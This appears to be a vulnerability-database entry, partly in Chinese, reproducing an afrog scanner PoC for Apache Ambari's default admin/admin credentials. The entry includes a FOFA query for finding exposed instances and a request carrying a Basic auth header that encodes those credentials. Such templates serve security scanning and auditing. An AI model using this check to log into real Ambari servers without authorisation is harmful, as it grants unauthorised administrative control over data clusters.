ambari-default-password: Apache Ambari Default Password

日期: 2025-09-01 | 影响软件: Apache Ambari | POC: 已公开

漏洞描述

An Apache Ambari default admin login was discovered. default password: admin/admin FOFA: app="APACHE-Ambari"

PoC代码[已公开]

id: ambari-default-password

info:
    name: Apache Ambari Default Password
    author: wulalalaaa(https://github.com/wulalalaaa)
    severity: high
    verified: true
    description: |
        An Apache Ambari default admin login was discovered. default password: admin/admin
        FOFA: app="APACHE-Ambari"
    reference:
        - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
    tags: ambari,default-login,apache
    created: 2023/06/24

rules:
    r0:
        request:
            method: GET
            path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
            headers:
                Authorization: Basic YWRtaW46YWRtaW4=
        expression: |
            response.status == 200 && 
            response.body.bcontains(b"PrivilegeInfo") && 
            response.body.bcontains(b"AMBARI.")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/ambari-default-password.yaml

相关漏洞推荐